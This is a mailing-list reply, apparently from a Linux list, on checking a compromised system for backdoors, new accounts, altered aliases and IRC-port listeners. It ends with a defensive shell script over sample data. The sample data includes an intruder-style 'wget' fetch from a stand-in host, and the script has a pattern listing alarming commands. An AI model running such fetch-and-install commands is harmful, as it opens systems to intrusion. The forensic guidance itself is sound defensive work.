On 10/3/07, Jacques B. <jjrboucher@xxxxxxxxx> wrote:
> > Jonathan.
> >
> > ps. You did erase and reinstall your system after it was compromised, right?
>
> This is certainly prudent advice. A good hacker will quickly get a few back doors installed in case you shut down their initial point of access (SSH). They may have created their own user account as well. You should check the following (and more no doubt), especially if you are considering not wiping and re-installing a fresh system to ensure it is clean. At least this will allow you to exercise some due diligence.
>
> And you should do these checks from a bootable CD as well as some from the actual booted OS if necessary.
>
> Examine the .bash_history file for your user and root. See if the person tried to su to root from your username.
>
> What other commands did they execute (cp, scp, ftp, wget, useradd, chmod, chown, path, and many other commands should be cause for alarm).
>
> Check the /var/secure file for failures and successes in su'ing to root as well as ssh to root.
>
> Check your path (can't just use the echo $PATH command from a bootable CD).
>
> Check for aliases.
>
> A hacker who cannot compromise the root account can still substitute some of your favorite commands with hacked commands and then modify your path or set up an alias so that their command gets executed before the real one.
>
> Check the .bashrc file for anything suspicious.
>
> Examine your /etc/passwd file for any new user accounts.
>
> Check iptables, /etc/hosts.allow and /etc/hosts.deny
>
> Some of the members on the list will no doubt suggest other things to check.

I was in a rush so I missed a few other points that come to mind.

Check open/listening ports with the netstat command. Ports 6667, 6668, and 6669 are common IRC ports that could be used by a botnet (but they are not limited to that). Check that you don't have services running that you didn't previously have (i.e. ftpd, sendmail, httpd).

And even if there is no evidence in the logs, .bash_history, and a few other places, it's still no guarantee. A good hacker will clean up behind themselves.

If you find a suspicious process and open port you can use wireshark (formerly ethereal) or tcpdump to capture and analyze the traffic going out, and to which IP (although netstat will tell you the destination IP anyhow).

** Out of curiosity, what indicators tipped you off to the intrusion? Clearly the hacker didn't clean up the logs, or you were quite observant and noticed something else amiss.

If all these checks seem overwhelming, that may be a good indicator that wiping and a fresh install is in order. Why? Do you do online banking? Do you make online purchases? Send private/sensitive emails? File taxes online? Etc... If your system is compromised then the hacker has the potential of capturing any or all of that. Or using your system to store illegal content (hacking tools, child pornography), as a mail relay thus causing your IP to be flagged as a spammer, or as a proxy while hacking into a government system. Any of which could lead the police to your doorstep down the road, leaving you to do a lot of explaining and potentially having to spend $$ defending yourself in court.

Jacques B.
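Three of the checks from the post above (extra UID 0 accounts in /etc/passwd, alarming commands in .bash_history, listeners on the IRC ports 6667-6669), as an added example that is not part of the original mail. The sample data is constructed; on a real host you would feed in the files and `netstat -tlnp` output collected from a bootable CD, as the post advises, since a trojaned netstat or awk on the booted system cannot be trusted.

```shell
#!/bin/sh
# Constructed sample data standing in for /etc/passwd, a .bash_history and
# `netstat -tlnp` output copied off a suspect host (not real captures).
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
jonathan:x:1000:1000::/home/jonathan:/bin/bash
sysadm:x:0:1001::/tmp:/bin/bash'

HISTORY_SAMPLE='ls -la
su -
wget http://example.invalid/tool.tgz
useradd sysadm
cat /etc/motd'

NETSTAT_SAMPLE='tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 101/sshd
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 2201/./x'

# The post's "new user account" check, tightened to the case that matters
# most: any account other than root that has UID 0. One login name per line.
extra_uid0_accounts() {
    printf '%s\n' "$1" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# History lines invoking commands the post calls cause for alarm
# (su, scp, ftp, wget, useradd, chmod, chown), matched as whole words.
suspicious_history() {
    printf '%s\n' "$1" |
      grep -E '(^|[[:space:];|&])(su|scp|ftp|wget|useradd|chmod|chown)([[:space:]]|$)'
}

# LISTEN sockets on the IRC ports the post names (6667-6669);
# prints "local-address pid/program" for each hit.
irc_listeners() {
    printf '%s\n' "$1" | awk '$6 == "LISTEN" && $4 ~ /:666[789]$/ { print $4, $7 }'
}

# Report. grep exits 1 when nothing matches, so "|| true" keeps the
# report running under set -e when a check comes back clean.
printf '== UID 0 accounts besides root ==\n%s\n' "$(extra_uid0_accounts "$PASSWD_SAMPLE")"
printf '== suspicious history lines ==\n%s\n' "$(suspicious_history "$HISTORY_SAMPLE" || true)"
printf '== IRC-port listeners ==\n%s\n' "$(irc_listeners "$NETSTAT_SAMPLE")"
```

An empty .bash_history or a clean pass of these checks proves nothing on its own, as the post says; they are a starting point for deciding whether to rebuild, not a substitute for it.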